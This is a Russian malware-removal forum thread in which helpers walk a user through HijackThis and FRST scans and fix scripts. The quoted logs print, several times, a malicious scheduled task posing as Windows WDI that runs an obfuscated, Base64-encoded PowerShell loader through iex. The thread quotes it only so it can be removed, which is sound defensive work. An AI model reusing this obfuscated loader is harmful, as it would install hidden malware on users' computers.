Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Lev45, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:
Код:
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O22 - Task (.job): (Not scheduled) UCBrowserUpdater.job - D:\Programs\UCBrowser\Application\update_task.exe /update
O22 - Task (.job): (Not scheduled) UCBrowserUpdaterCore.job - D:\Programs\UCBrowser\Application\update_task.exe /task=1
O22 - Task: (disabled) \Microsoft\Windows\WDI\WDI - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$ddd = 'uHamOuNl6jbTIu1LyFLAQMpLzBGMTcoYnASYWNA7nnH/duJmsm3uN/Ri7RH0cbFkkRHHGdVUgVLTVJ0R1VKlDYV9lXLxPrstrD2gPPEvxxX3OdB2kwSbBMgjkQOcFYVephWcTKhxm07ifvZ6tD2tLq8gvUiuJq8i11DPRcpZ01SaTbMjkQOcB5I6t3vkP9lm/k3+afR3+gTdLqVXiwSZBI1YzBGMWdNUml6pDpN7jl/lZeFR+XvyauRx/U2kcv54igTDVJpevQONAqkXjR6cX9thmCW0Y6Bz7nDjYbw2+UukZuxkxEWKXq8VnCKNA5gfhgONStYv3X30LKpx72+1S/Vz/QXzV/BwnFrcAtUUjRPIWLMjkQOcB5I6unH+Z+tx6EKhIsdg5h3Cdexxz1WrBJoZhhfAWIYVn12HAJVxmmqwQvdw6Hr2NshdpyP0Zvp1lDOdEYwVmljMApsAxjeNFq1xim7/f/1mz2vpfeB/oVmpPbFGnACcJIc1hhTAWcFZyFjMC9Q2zyn7J+R35Xe5Mbp771jbffFgpEWbFMhdhhXIQ9hCwQvMEc4pvnvkPNxi8nv0daE/xBnuffJhlEHJUMU9iQiBHZ0dyEXTRpV+xEXjZfxq8njGQ+xz/RjdLqV1mxLQK4URnBi1StIChwWGBtcnnCm6SuNi6HfGIrth4B6oT/J1jQmlStI1wljMA9lZwVnBWZZy0TrjIK4u8Hq7K6hprRrqP6I21wKXHcpLlRWEA40LzBqCScI212r7M7V+uH7/JaN6/QTwLrA73QuSX4Ee2V6YGJhPgU3MC90v3WytSt1672v+da9c7ASuQ/p2qwSJBY0DnC3SSqsCjRGcB9cwmHq5Kqpxsl73dO5lyAX0e81xnQiKFYsE1VSOEYQDjUvMENFBinviUOlm8mumPPRzslTyZ+8p3RPWN40EuhWbAIcemxXAS8QwmnqtNfxw7DHIbOBm/APDe/txwgieWLMZhgS1VIsUyF2GB98nySy5aut79WvmPPMv7RXjNLdPqhiLBI0dxjOHHp4VmgS1WMVSi3H9U+9w+SmvS/Vg4B7nPLd6nBbVH4oajROcULsJmwSND9FdtjDDZfxm/XLJfeB27AKoMO1niU+/FZwijQOYH4YDjSOcEJp1lDa5OKctznr6fNV9zB7kPLY90EHQVIkUw1KdSYEFgh+DDd09wmP5d6YjsXH0bKE2+1n7ced9jRzcAtUruwmbBI0dxiSNGos6vHDzfupq8njGIrtH3Ta4OthxjTKMAoEej1jMAsFLzBHVSttmxDriP/1z8HbvMKMyq1yyPbZPyTzDVIdN2EuBFsBUiVDFB440yDfrNeE+tHb+YKE2+yuxSbY0hUG3BZxduwSaGYYXlRWEEZp9nza0cK4u+W67L6hprQi9Nr0v0S+dB8U/ihqNE5xQuwmbFpp510r4Y+ti+Hb1f69f/ATlbLcwjRONFcRUmivZLcQrmhWOP9ts0De+UuJs73qzMbp771ikbLZv3Q7FUthSlRWEA40LzB/VQM42hGP1ff1m53rjcfVvrR+9MPA6ihSaA5wCgR6PWNhcyCu7G4xgnHO+XO939EKhIsx751i1JK8k1UHcH8Y8jR6PBIBZwUvMEIwpnXvzMaZYz2bobOR/pyTlbOs6vA+bH4wZhhe1StIlvDbQTLhxjVzpZetwtDv0MagyoVTpP70ikhTNCZo7j0iPUsFLzAKbX6Rhi3fNK7RG73z6aORW6AThR+tmkA+fWLMzhx6eFZoEtUrSNpBWmG31J7pQ6G3yduY6rQLzPbYv3RPFK7sJmwSNHcY+jQTGNZp2q3vhZOtw6EKhIsJg7BH0cbcwmAXTUs4B1VLDVJoDwUvMENFVlXL/Zs926HDJfeV7+xXjYKIwnwCUA41LzALGJZsVmjGPB5FgxDrlcLUn7jHrau5q8E2kZKQwi0+/FZwijQOYH4YDjVjBHrBhjTPeZOJvpw==';iex('$'+'d=([regex]::Matches(''==QKpcSKkRCKn5WayR3UnsyJ0V2RugjRUVlO601ZulGZvNmbF5Cd4VGVu0WZ0NXeTt1JogXZphCI4VWa7kiclJWb15GbhlmclNlLqJ2bkAyKgcCInAyKgwWZk9WTuomYvRCKgkSKkRGZkgyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WoAyYlRGI9ACZksjclJWb15GbhlmclNFIswWZk9WTgQ3YlxWZzBCfg03JwUkVJJFRMF0QJNVWIBFXuwFXnAScl1CIElUZjlmdlRkLfRyegUmclh2dgwHIlZXayR2azlGZfJzMul2dgkWb3dGI9Aiai9GJ9tjYjRCIuJXd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvhnYtASKyUTMgI3bi1CIzRCIk5WYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVGd5JEdldkL4YEVVpjOddmbpR2bj5WRuQHelRlLtVGdzl3UbBSPgIGcksXKzNXYwRSXn5WayR3cbBCLiNGJd11WlRXeitFKjVGZg42bpR3YuVnZ'',''.'',''RightToLeft'') | ForEach {$_.value}) -join '''';$'+'d=[Sy'+'stem.Te'+'xt'+'.E'+'ncod'+'ing]:'+':U'+'TF'+2*2*2+'.Get'+'Strin'+'g([Sy'+'stem.Conv'+'ert]:'+':FromBa'+'se'+8*8+'String($d));$'+'d|i'+'ex;')"
O22 - Task: (disabled) \Microsoft\Windows\Windows Media Sharing\UpdateLibrary - C:\Program Files\Windows Media Player\wmpnscfg.exe (file missing)
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:
Код:
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O22 - Task (.job): (Not scheduled) UCBrowserUpdater.job - D:\Programs\UCBrowser\Application\update_task.exe /update
O22 - Task (.job): (Not scheduled) UCBrowserUpdaterCore.job - D:\Programs\UCBrowser\Application\update_task.exe /task=1
O22 - Task: (disabled) \Microsoft\Windows\WDI\WDI - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$ddd = 'uHamOuNl6jbTIu1LyFLAQMpLzBGMTcoYnASYWNA7nnH/duJmsm3uN/Ri7RH0cbFkkRHHGdVUgVLTVJ0R1VKlDYV9lXLxPrstrD2gPPEvxxX3OdB2kwSbBMgjkQOcFYVephWcTKhxm07ifvZ6tD2tLq8gvUiuJq8i11DPRcpZ01SaTbMjkQOcB5I6t3vkP9lm/k3+afR3+gTdLqVXiwSZBI1YzBGMWdNUml6pDpN7jl/lZeFR+XvyauRx/U2kcv54igTDVJpevQONAqkXjR6cX9thmCW0Y6Bz7nDjYbw2+UukZuxkxEWKXq8VnCKNA5gfhgONStYv3X30LKpx72+1S/Vz/QXzV/BwnFrcAtUUjRPIWLMjkQOcB5I6unH+Z+tx6EKhIsdg5h3Cdexxz1WrBJoZhhfAWIYVn12HAJVxmmqwQvdw6Hr2NshdpyP0Zvp1lDOdEYwVmljMApsAxjeNFq1xim7/f/1mz2vpfeB/oVmpPbFGnACcJIc1hhTAWcFZyFjMC9Q2zyn7J+R35Xe5Mbp771jbffFgpEWbFMhdhhXIQ9hCwQvMEc4pvnvkPNxi8nv0daE/xBnuffJhlEHJUMU9iQiBHZ0dyEXTRpV+xEXjZfxq8njGQ+xz/RjdLqV1mxLQK4URnBi1StIChwWGBtcnnCm6SuNi6HfGIrth4B6oT/J1jQmlStI1wljMA9lZwVnBWZZy0TrjIK4u8Hq7K6hprRrqP6I21wKXHcpLlRWEA40LzBqCScI212r7M7V+uH7/JaN6/QTwLrA73QuSX4Ee2V6YGJhPgU3MC90v3WytSt1672v+da9c7ASuQ/p2qwSJBY0DnC3SSqsCjRGcB9cwmHq5Kqpxsl73dO5lyAX0e81xnQiKFYsE1VSOEYQDjUvMENFBinviUOlm8mumPPRzslTyZ+8p3RPWN40EuhWbAIcemxXAS8QwmnqtNfxw7DHIbOBm/APDe/txwgieWLMZhgS1VIsUyF2GB98nySy5aut79WvmPPMv7RXjNLdPqhiLBI0dxjOHHp4VmgS1WMVSi3H9U+9w+SmvS/Vg4B7nPLd6nBbVH4oajROcULsJmwSND9FdtjDDZfxm/XLJfeB27AKoMO1niU+/FZwijQOYH4YDjSOcEJp1lDa5OKctznr6fNV9zB7kPLY90EHQVIkUw1KdSYEFgh+DDd09wmP5d6YjsXH0bKE2+1n7ced9jRzcAtUruwmbBI0dxiSNGos6vHDzfupq8njGIrtH3Ta4OthxjTKMAoEej1jMAsFLzBHVSttmxDriP/1z8HbvMKMyq1yyPbZPyTzDVIdN2EuBFsBUiVDFB440yDfrNeE+tHb+YKE2+yuxSbY0hUG3BZxduwSaGYYXlRWEEZp9nza0cK4u+W67L6hprQi9Nr0v0S+dB8U/ihqNE5xQuwmbFpp510r4Y+ti+Hb1f69f/ATlbLcwjRONFcRUmivZLcQrmhWOP9ts0De+UuJs73qzMbp771ikbLZv3Q7FUthSlRWEA40LzB/VQM42hGP1ff1m53rjcfVvrR+9MPA6ihSaA5wCgR6PWNhcyCu7G4xgnHO+XO939EKhIsx751i1JK8k1UHcH8Y8jR6PBIBZwUvMEIwpnXvzMaZYz2bobOR/pyTlbOs6vA+bH4wZhhe1StIlvDbQTLhxjVzpZetwtDv0MagyoVTpP70ikhTNCZo7j0iPUsFLzAKbX6Rhi3fNK7RG73z6aORW6AThR+tmkA+fWLMzhx6eFZoEtUrSNpBWmG31J7pQ6G3yduY6rQLzPbYv3RPFK7sJmwSNHcY+jQTGNZp2q3vhZOtw6EKhIsJg7BH0cbcwmAXTUs4B1VLDVJoDwUvMENFVlXL/Zs926HDJfeV7+xXjYKIwnwCUA41LzALGJZsVmjGPB5FgxDrlcLUn7jHrau5q8E2kZKQwi0+/FZwijQOYH4YDjVjBHrBhjTPeZOJvpw==';iex('$'+'d=([regex]::Matches(''==QKpcSKkRCKn5WayR3UnsyJ0V2RugjRUVlO601ZulGZvNmbF5Cd4VGVu0WZ0NXeTt1JogXZphCI4VWa7kiclJWb15GbhlmclNlLqJ2bkAyKgcCInAyKgwWZk9WTuomYvRCKgkSKkRGZkgyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WoAyYlRGI9ACZksjclJWb15GbhlmclNFIswWZk9WTgQ3YlxWZzBCfg03JwUkVJJFRMF0QJNVWIBFXuwFXnAScl1CIElUZjlmdlRkLfRyegUmclh2dgwHIlZXayR2azlGZfJzMul2dgkWb3dGI9Aiai9GJ9tjYjRCIuJXd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvhnYtASKyUTMgI3bi1CIzRCIk5WYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVGd5JEdldkL4YEVVpjOddmbpR2bj5WRuQHelRlLtVGdzl3UbBSPgIGcksXKzNXYwRSXn5WayR3cbBCLiNGJd11WlRXeitFKjVGZg42bpR3YuVnZ'',''.'',''RightToLeft'') | ForEach {$_.value}) -join '''';$'+'d=[Sy'+'stem.Te'+'xt'+'.E'+'ncod'+'ing]:'+':U'+'TF'+2*2*2+'.Get'+'Strin'+'g([Sy'+'stem.Conv'+'ert]:'+':FromBa'+'se'+8*8+'String($d));$'+'d|i'+'ex;')"
O22 - Task: (disabled) \Microsoft\Windows\Windows Media Sharing\UpdateLibrary - C:\Program Files\Windows Media Player\wmpnscfg.exe (file missing)
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
Запутать хотели? Или в архиве, или по отдельности крепите. Не делайте так больше.
Отключите до перезагрузки антивирус. Выделите и скопируйте в буфер обмена следующий код:
Код:
Start::
CreateRestorePoint:
CloseProcesses:
Task: {6C76506E-C025-47ED-978B-C36F3AF7BF8D} - \точка восст. -> No File <==== ATTENTION
Task: {6DD06AB4-F4DD-4FDE-8A02-05A96606A203} - System32\Tasks\Microsoft\Windows\WDI\WDI => powershell.exe -c "$ddd = 'uHamOuNl6jbTIu1LyFLAQMpLzBGMTcoYnASYWNA7nnH/duJmsm3uN/Ri7RH0cbFkkRHHGdVUgVLTVJ0R1VKlDYV9lXLxPrstrD2gPPEvxxX3OdB2kwSbBMgjkQOcFYVephWcTKhxm07ifvZ6tD2tLq8gvUiuJq8i11DPRcpZ01SaTbMjkQOcB5I6t3vkP9lm/k3+afR3+gTdLqVXiwSZBI1YzBGMWdNUml6pDpN7jl/lZeFR+XvyauRx/U2kcv54igTDVJpevQONAqkXjR6cX9thmCW0Y6Bz (the data entry has 2625 more characters).
Task: {CCA71568-F983-4D3C-946B-3CF9B07DFE4F} - \Opera scheduled Autoupdate 1565807603 -> No File <==== ATTENTION
CHR Profile: C:\Users\SHURAVI\AppData\Local\Google\Chrome\User Data\System Profile [2019-09-16]
U4 DiagTrack; no ImagePath
U4 dmwappushservice; no ImagePath
2019-08-20 10:11 - 2017-09-12 19:28 - 000056714 ___SH () C:\Program Files\534F52B2CB23A9AEA4BB05AC39FAD05B903CA944554D.ico
2019-08-20 10:11 - 2017-01-29 17:47 - 000051108 ___SH () C:\Program Files (x86)\534F521ED0BF68F2E8C9F5B627C6F394FED05D44554D.ico
ContextMenuHandlers1: [cm_64bit] -> {69E19770-EA24-49e2-B997-405EDBEF4C05} => -> No File
ContextMenuHandlers2: [cm_64bit] -> {69E19770-EA24-49e2-B997-405EDBEF4C05} => -> No File
ContextMenuHandlers4: [cm_64bit] -> {69E19770-EA24-49e2-B997-405EDBEF4C05} => -> No File
HKLM\...\StartupApproved\Run: => "SecurityHealth"
HKLM\...\StartupApproved\Run: => "ZAM"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "ZAM"
FirewallRules: [{ACB789E9-9697-46BB-8384-00B05F138667}] => (Allow) powershell.exe No File
FirewallRules: [{C83DA5B5-8380-44DC-9C17-1D7DF29C1535}] => (Block) G:\win 10 tweaker 14.0 portable by xpuct.exe No File
Reboot:
End::
Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.
Фикс не сработал, надо так сделать.
Сохраните файл из вложения в папку с FRST64.exe (на рабочий стол). fixlist.txt
Отключите до перезагрузки антивирус. Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Фикс не сработал, надо так сделать.
Сохраните файл из вложения в папку с FRST64.exe (на рабочий стол). fixlist.txt
Отключите до перезагрузки антивирус. Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.